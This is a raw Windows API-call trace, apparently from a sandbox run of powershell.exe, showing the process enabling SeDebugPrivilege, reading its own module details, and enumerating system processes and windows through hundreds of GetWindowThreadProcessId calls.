	[0427.435] GetCurrentProcessId () returned 0xc60
	[0427.680] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cdd0 | out: lpLuid=0x12cdd0*(LowPart=0x14, HighPart=0)) returned 1
	[0427.682] GetCurrentProcess () returned 0xffffffffffffffff
	[0427.683] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cdf0 | out: TokenHandle=0x12cdf0*=0x2e4) returned 1
	[0427.684] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2c6ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0427.685] CloseHandle (hObject=0x2e4) returned 1
	[0427.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc60) returned 0x2e4
	[0427.698] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2c6abb8, cb=0x200, lpcbNeeded=0x12de08 | out: lphModule=0x2c6abb8, lpcbNeeded=0x12de08) returned 1
	[0427.700] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2c6ae28, cb=0x18 | out: lpmodinfo=0x2c6ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0427.701] CoTaskMemAlloc (cb=0x804) returned 0x39c8e0
	[0427.701] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x39c8e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0427.701] CoTaskMemFree (pv=0x39c8e0) 
	[0427.702] CoTaskMemAlloc (cb=0x804) returned 0x39c8e0
	[0427.702] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x39c8e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0427.702] CoTaskMemFree (pv=0x39c8e0) 
	[0427.703] CloseHandle (hObject=0x2e4) returned 1
	[0427.712] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc60) returned 0x2e4
	[0427.712] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x12df38 | out: lpExitCode=0x12df38*=0x103) returned 1
	[0427.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c6b088, Length=0x20000, ResultLength=0x12df00 | out: SystemInformation=0x12c6b088, ResultLength=0x12df00*=0x27340) returned 0xc0000004
	[0427.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c8b0b8, Length=0x29b40, ResultLength=0x12df00 | out: SystemInformation=0x12c8b0b8, ResultLength=0x12df00*=0x27340) returned 0x0
	[0428.045] EnumWindows (lpEnumFunc=0x2a666ac, lParam=0x0) 
	[0428.797] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0429.248] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x558
	[0429.565] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0429.987] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0430.080] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0430.360] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x538
	[0430.627] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0430.860] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x778
	[0431.221] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x778
	[0431.454] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0431.785] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.203] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.693] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.693] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x460
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x948
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1178
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x13e0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xcd0
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x13fc
	[0432.694] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xdc8
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc18
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc2c
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa1c
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1244
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xdb0
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1398
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1358
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1370
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1340
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x130c
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x12c0
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x12e4
	[0432.695] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1270
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1298
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x120c
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x122c
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x11c4
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x11b0
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1188
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1148
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1160
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x10fc
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe34
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xea4
	[0432.696] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x514
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe48
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xbc8
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xdf8
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x318
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xcac
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x8bc
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf9c
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf48
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe40
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xecc
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xeb8
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe80
	[0432.697] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe98
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe60
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xee4
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf00
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xdf0
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe1c
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xdd0
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xd94
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xd74
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xd00
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xcd8
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc84
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xca4
	[0432.698] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc64
	[0432.699] GetWindow (hWnd=0x2010e, uCmd=0x4) returned 0x0
	[0432.700] IsWindowVisible (hWnd=0x2010e) returned 0
	[0432.700] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc24
	[0432.700] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb84
	[0432.700] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xbac
	[0432.700] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x384
	[0432.700] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xab8
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x33c
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa44
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa64
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x8a8
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xaf0
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x88c
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb04
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x910
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x230
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xac0
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xab4
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xaac
	[0432.701] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x3d0
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x978
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa7c
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x59c
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa88
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa6c
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa68
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x9f8
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa04
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x924
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x8dc
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x7dc
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x768
	[0432.702] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x764
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x820
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x810
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x794
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x83c
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x7ac
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb44
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb5c
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x838
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.703] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x818
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x5b8
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x494
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1ec
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x440
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x7e8
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x730
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x2c8
	[0432.704] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x31c
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x330
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x128
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x5c8
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x6f8
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x358
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x73c
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb0
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x250
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x240
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x790
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x61c
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x540
	[0432.705] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x538
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x568
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x538
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x568
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x538
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x540
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x540
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x57c
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x460
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x554
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x528
	[0432.706] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x79c
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4e0
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x460
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x460
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x44c
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x778
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x460
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x558
	[0432.707] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4d0
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1404
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x11b8
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xbd4
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe0c
